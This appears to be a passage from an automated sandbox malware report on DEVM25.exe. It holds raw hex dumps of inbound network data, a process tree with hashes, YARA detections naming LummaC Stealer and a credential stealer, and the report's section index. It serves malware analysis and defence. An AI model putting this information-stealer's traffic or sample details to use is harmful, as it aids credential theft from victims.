mU!tyz28&K]Q5DAGsm^wxmlIlYLG_Q}*rM2Ri( N,iMc&z]WHx@^Y#9v_lr=6LN5srz{J;&3cHh_RX0\fb\|f+wwSoT<Qh`X
2025-03-14 10:47:23 UTC	1369	IN	Data Raw: 91 d0 82 e4 c8 b7 c1 e9 40 52 9c 54 eb 74 d9 94 3f f6 2c bd 1b 33 0e a0 d5 31 11 65 e0 70 ab 3e bd 62 20 95 cf 62 62 04 c7 e3 f5 f0 36 10 54 59 c9 44 17 17 54 cb f3 0a 7c 82 70 d4 22 ba 27 45 3e a9 0f 1a 77 7b 7e d2 d9 1a 93 94 37 0c 49 0e 49 2b 23 ca 8f 4f e1 16 04 02 5a c3 f8 0e 6c e0 7a 55 2a 7e 3b 66 72 f3 c3 51 f2 02 c3 da 1d 0c d5 6f 18 da b0 6c 23 64 2b fc 28 2a 7a 10 4f 69 24 f0 d8 11 01 c5 00 21 6a 1b 4d 32 91 0a 40 03 d5 9e 11 2b 95 a3 1d 2e 2b c1 40 e7 a9 73 32 29 e7 88 dd ab 02 67 7a 70 30 8f ea f3 9e 54 8c 18 df 07 84 22 b0 4b fd f6 0c b3 52 4d 7d 9f 0b 7f 08 f5 2f 4c b0 70 09 71 4d 54 34 18 e9 7f f9 ac 44 46 93 a8 a5 e7 1b 32 1a 88 7e 3b 9a a6 80 7c 46 f3 a8 76 67 97 bc ae cc c5 05 68 9b 1d b0 2f b0 b1 52 59 fd 14 f7 9f 52 61 cb 99 65 b3 83 Data Ascii: @RTt?,31ep>b bb6TYDT\|p"'E>w{~7II+#OZlzU~;frQol#d+(zOi$!jM2@+.+@s2)gzp0T"KRM}/LpqMT4DF2~;\|Fvgh/RYRae
2025-03-14 10:47:23 UTC	1369	IN	Data Raw: a5 fe 25 d0 01 c0 2a 03 ac d5 d6 10 70 f0 52 4a a2 12 66 fd 73 ce 8b 0b 94 17 f5 3b 77 8b 04 20 31 46 a2 38 ca 2f a2 74 37 e3 40 7f ca 14 34 fd 50 a5 4d 6c 8b c3 ae 22 fd ab b3 cf ce 6a 5d 98 5a e0 77 00 1e 30 4d 28 8f 67 06 0e e4 f8 e5 19 72 99 34 86 02 ab 34 7d 00 c5 b3 27 cb d5 91 27 ad d1 44 d1 b7 99 0f cf 6f 53 d0 5d e4 66 42 a6 03 97 99 b8 a9 7c cd 64 13 56 4f ae 90 de 33 73 b1 b0 fb 99 53 88 45 0d d7 cb f0 62 e6 3c ad 81 72 2e 54 87 f7 c5 59 fb 6f 77 8e 2b 4a 5f 16 6c 6a d6 f1 e6 36 2a 8a 96 c7 4c 6c c2 f9 92 b2 78 66 f1 d4 51 d7 47 e6 ac 8e 7d cc 9e e5 05 fc 16 70 bf 32 1c be ae ba 3b e1 00 dd 1a ff 4d eb c4 5e f3 90 4e d2 05 a8 c5 07 f5 bf 31 e5 cb 2f a0 7b 3b 7d 9f 78 bc 01 6d 25 66 05 7c f8 bb 6a 75 09 da 07 50 c9 70 ee b2 ec 23 76 3c 2d 31 ed Data Ascii: %pRJfs;w 1F8/t7@4PMl"j]Zw0M(gr44}''DoS]fB\|dVO3sSEb<r.TYow+J_lj6LlxfQG}p2;M^N1/{;}xm%f\|juPp#v<-1
2025-03-14 10:47:23 UTC	1369	IN	Data Raw: ea 86 02 96 62 8e 93 9a 19 73 00 bd 98 86 f8 c2 54 b7 fe da 51 1f 92 5e fe a3 83 df 82 c0 6d 60 f2 0c 12 25 b2 c2 28 4b 85 56 2a 18 e0 7b ba e7 65 f9 6a 29 84 d5 0d 62 9a e6 ae 23 63 bd c6 86 ed d7 02 e9 49 c1 02 6a b0 a0 52 72 3e 5b fb 7c 22 8e 5a f4 90 e8 08 ea 96 18 11 6f e2 b0 9a 69 9e 61 20 8d 73 98 65 7b 08 f2 0c 9e 9b 6d 02 07 2f b0 e6 ff 74 b1 bb bc 97 60 08 49 e4 87 44 86 2d ae d4 1b d1 f3 1b bf 20 6c ef 15 e1 e5 05 10 29 a1 f3 c9 f0 7d ea bc 24 34 83 26 cd c3 4d 34 00 99 7e 44 9c 81 88 a3 f5 35 98 ec f9 fc 4d dc d3 12 e7 55 37 5b cd 10 46 3d 4c fd 2a ea 15 ad 06 fc a0 c3 de 42 c9 15 b1 28 6d 35 52 09 24 a1 24 c0 2a 4a a9 aa 68 e2 4c 97 af cd ef bc 13 59 9e 54 23 07 61 ea fd cc 37 f4 8a c4 01 ce aa d4 36 19 ce 8a 40 d6 af 58 5f 24 0d 29 94 97 c5 Data Ascii: bsTQ^m`%(KV{ej)b#cIjRr>[\|"Zoia se{m/t`ID- l)}$4&M4~D5MU7[F=LB(m5R$$*JhLYT#a76@X_$)
2025-03-14 10:47:23 UTC	1369	IN	Data Raw: 3a f6 3a d9 5a 7c 71 5d d2 eb fb d8 c0 f7 d0 c3 6e c2 3d 5f 81 2e 07 2d fd 2b 49 6b d7 d1 39 1e aa ef aa 25 08 bf cb 69 df 8a af ea d4 45 e7 fc fd 4e d3 a0 33 29 9b be 1b 27 1c 34 0f a4 e0 76 28 8e 67 fb 33 2b e2 a7 9d 29 aa a1 f0 8c 6a cb c7 76 22 61 62 5a 06 eb 9c 7e a1 3a 47 32 29 46 be 3e 94 e8 59 46 ee 4b 03 15 b8 4b cc 95 5d 5e 02 6a e1 2a 72 0d 9b 61 97 e9 09 35 27 9f 0b 9d 27 fc 8d c5 a5 b3 0f b3 6e 78 58 50 eb 69 e9 89 bb 66 1b 85 3a 4a b0 83 63 7b 3c e5 3d 93 0f b0 85 2c 95 17 47 6c fe 42 ce 98 c6 63 8e 4c 36 c4 02 b3 c4 23 c7 87 06 c0 ca ad 8d 3f fc d4 92 74 6e 2c 9b b5 46 c5 b7 6d 4f 3b 96 b5 2a f9 ae fd 3c 57 77 c9 d0 36 6b 75 c0 24 94 be 22 19 03 cb de 97 c7 65 88 0b 10 02 65 44 27 4b 62 0a 25 c2 94 13 be 73 2e be ad 4e c5 c6 87 d1 e1 ed b6 Data Ascii: ::Z\|q]n=_.-+Ik9%iEN3)'4v(g3+)jv"abZ~:G2)F>YFKK]^jra5''nxXPif:Jc{<=,GlBcL6#?tn,FmO;<Ww6ku$"eeD'Kb%s.N
2025-03-14 10:47:23 UTC	1369	IN	Data Raw: f6 bd a8 09 82 12 cc 9a 5e 44 ab d3 b0 3f 42 60 f3 ee ac ee 30 6c 0a bb e9 c1 f1 42 ef 83 fe 2e 98 35 5b 6f 50 80 cc 80 4b 71 5e e0 a6 2d 7c 3c 38 90 e2 83 29 32 14 b5 3b 3f cf 87 00 70 46 ac 78 68 9b ca 90 99 98 56 78 19 30 1d fd c1 81 0f a9 4e 15 99 21 0f 74 8e f8 66 64 a1 97 8f be 69 c5 1a 94 cb 77 9c 77 ba b7 15 2a a6 8d 7e 9b 0c fb 75 88 d6 fb 32 4b 1c 91 c4 a4 e1 25 30 ba 9e 89 b5 56 3e 97 ae ec 47 5a 3c 3b 6f f8 cd 7b a2 db 46 c8 eb fd d8 f7 1d b9 1d 22 bc b3 70 43 a2 d4 5a 90 ee 93 45 ea 05 17 0f f2 8f 29 90 af 88 47 a0 94 4a ec b9 54 5a e8 ec 92 87 42 ba 9b da f8 f4 9b f1 d5 1a 85 7e d4 05 65 ab e4 fc 44 f0 7f e7 8e ee be a9 9c 6c 22 63 97 6c 6b 61 e9 45 67 85 12 94 47 a6 ac 14 a3 e8 5f 67 15 e2 27 53 a1 74 a6 f4 93 50 9d 45 4b 6d a2 7d 43 99 5f Data Ascii: ^D?B`0lB.5[oPKq^-\|<8)2;?pFxhVx0N!tfdiww*~u2K%0V>GZ<;o{F"pCZE)GJTZB~eDl"clkaEgG_g'StPEKm}C_
2025-03-14 10:47:23 UTC	1369	IN	Data Raw: c1 32 bd 02 c2 36 e1 04 5d 82 84 15 b2 49 b7 25 21 79 11 ed 27 78 2d 36 39 a4 b1 52 45 fa 55 e4 f1 c6 ed df db f2 fc 6a 83 9a 56 6b c4 da e6 dd dd b4 2d bd 31 37 12 d8 ac 61 3f e7 fe ad 84 12 9c 2e 5e d0 c1 6d 17 7f 83 fa 72 04 b5 4c 42 d2 e0 64 35 58 e4 bc 70 10 3f 95 67 5c 4a 04 9d 7d 27 e2 3b 3f 92 ce 6f 0c 6b e8 da c5 6e 27 ca 73 31 fb 55 dc d8 91 a6 8d 97 ee 6e b4 23 44 25 f7 60 50 d1 dd 5f ac 47 08 c7 ff 89 7e 25 75 5a 0a 1f 0f 6e 47 d1 43 c5 bb 3b a2 d6 15 f0 04 69 c3 4a 94 05 8a ae 01 64 82 5b 87 92 4b a3 7f 72 44 d3 56 9f 06 27 6d db 88 8e 25 e9 41 3f f6 8e b0 4c 0a 1b 88 b1 b7 82 09 55 9a 9c 2a 16 15 cd 92 14 09 f7 9e 4e 01 8d 1a d4 e5 47 07 e1 9d 60 72 09 cc 1b 20 5c 4b 95 bb 1a 75 a0 5b f8 9f 34 a3 0a 09 2f 85 9e 70 02 c7 37 00 16 03 cb dc 02 Data Ascii: 26]I%!y'x-69REUjVk-17a?.^mrLBd5Xp?g\J}';?okn's1Un#D%`P_G~%uZnGC;iJd[KrDV'm%A?LU*NG`r \Ku[4/p7
2025-03-14 10:47:23 UTC	1369	IN	Data Raw: 32 3f ff e4 7c d3 46 2b 9c 17 8d d3 28 47 98 9b 22 53 4a 49 f9 6a 1b 39 a9 21 58 50 61 2e ab d8 73 b6 5c 88 f4 11 b9 16 99 f7 2b 50 a3 01 ea ea cf 3b e6 3e 3c a0 8a e6 8e 80 c6 23 2a ae 74 8f 9d 3d 5c b1 68 b1 1c 99 9f e1 c6 5e b3 05 3e 6d 2b a9 59 a4 e6 76 89 47 b6 c5 a8 6a b9 81 64 00 db fe b7 c2 84 9d 37 df 8d 65 2a f1 fa 4e 2d 77 36 ed a7 70 f9 85 0d 01 e9 32 9a 2f a1 d9 ae 46 a0 b3 2c a2 f0 88 d5 17 fd 02 5a 81 30 22 70 e1 59 77 ef 75 75 51 64 c4 57 76 0a df f9 1b f7 44 39 3f 60 4c 4e 8d 64 87 01 a9 61 94 74 2d 85 c4 32 cb bf be 01 eb 68 98 08 79 5c bf 40 1d 71 f6 e4 66 88 f6 ef 66 61 5f 20 80 71 3f 42 cb 15 cb ae 88 93 b3 33 bc f7 ab 2e 45 40 3a 62 2c b3 be 1f 9a b4 bc ba 18 53 24 c1 69 96 70 cf 78 2a a9 ba e3 df 3e 07 63 fc af ba 83 9a ca 19 2b 65 Data Ascii: 2?\|F+(G"SJIj9!XPa.s\+P;><#t=\h^>m+YvGjd7eN-w6p2/F,Z0"pYwuuQdWvD9?`LNdat-2hy\@qffa_ q?B3.E@:b,S$ipx*>c+e
2025-03-14 10:47:23 UTC	429	IN	Data Raw: 55 9c fe a1 e5 92 2a 9e 8c c5 76 6f 69 ca f3 f2 e9 9e 30 59 ac a6 4d 95 a7 76 96 f6 67 db 7c 3d 51 5e 9d e1 13 6b cb 00 27 84 2c a4 98 6f b1 9f 4a 53 4f 99 7b 12 0f f8 df 28 8e 63 8a c4 2d 39 8a a6 19 dc 6c c9 ac 8a 39 17 fa 75 21 dc 93 60 48 1d 34 3f 64 4a 13 63 bc de 08 60 63 72 94 73 18 4e 86 c6 68 f8 55 15 cd 55 3c 95 b8 62 95 f2 71 2c 9e 33 39 44 22 24 98 7d 06 9a 18 26 d4 d9 4a b4 59 12 27 36 0a 5d ec 49 f9 5f ec ee 78 82 50 b9 99 1c e7 b9 45 e5 32 18 3f 1b e1 6d a8 ce 49 e3 33 d5 c9 45 50 9a 00 e4 d1 60 95 3a 61 8e f6 25 ab 5e 6d e9 ed ec 67 e4 db f2 1c 54 f7 2f af 3e c4 24 70 4e b0 57 be f2 82 e4 7d 68 57 13 24 5f fd 8f 85 1b c2 8c 77 58 38 df 0e 65 d6 fe 02 d0 f1 d2 56 c2 66 f6 28 8c 42 d7 c7 55 9a f5 c1 01 61 d1 b4 bb 3a 57 7b 61 a5 6a a1 8b bd Data Ascii: U*voi0YMvg\|=Q^k',oJSO{(c-9l9u!`H4?dJc`crsNhUU<bq,39D"$}&JY'6]I_xPE2?mI3EP`:a%^mgT/>$pNW}hW$_wX8eVf(BUa:W{aj

Target ID:	0
Start time:	06:47:09
Start date:	14/03/2025
Path:	C:\Users\user\Desktop\DEVM25.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DEVM25.exe"
Imagebase:	0xb10000
File size:	1'369'600 bytes
MD5 hash:	9FE5481F315BA58F770036D3FD7E4DF6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1035349041.0000000002BFA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:47:09
Start date:	14/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff74be10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:47:09
Start date:	14/03/2025
Path:	C:\Users\user\Desktop\DEVM25.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DEVM25.exe"
Imagebase:	0xb10000
File size:	1'369'600 bytes
MD5 hash:	9FE5481F315BA58F770036D3FD7E4DF6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1024350882.0000000000AB5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2190447431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1024777986.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	06:47:11
Start date:	14/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 404
Imagebase:	0xa0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DEVM25.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DEVM25.exe_2871c4a7abf9ed68c23d8c9482599cc5797388_9ddfdaa4_d18d61bf-557a-43c1-932c-c06bdb909452\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE58A.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE750.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE926.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Windows Analysis Report
DEVM25.exe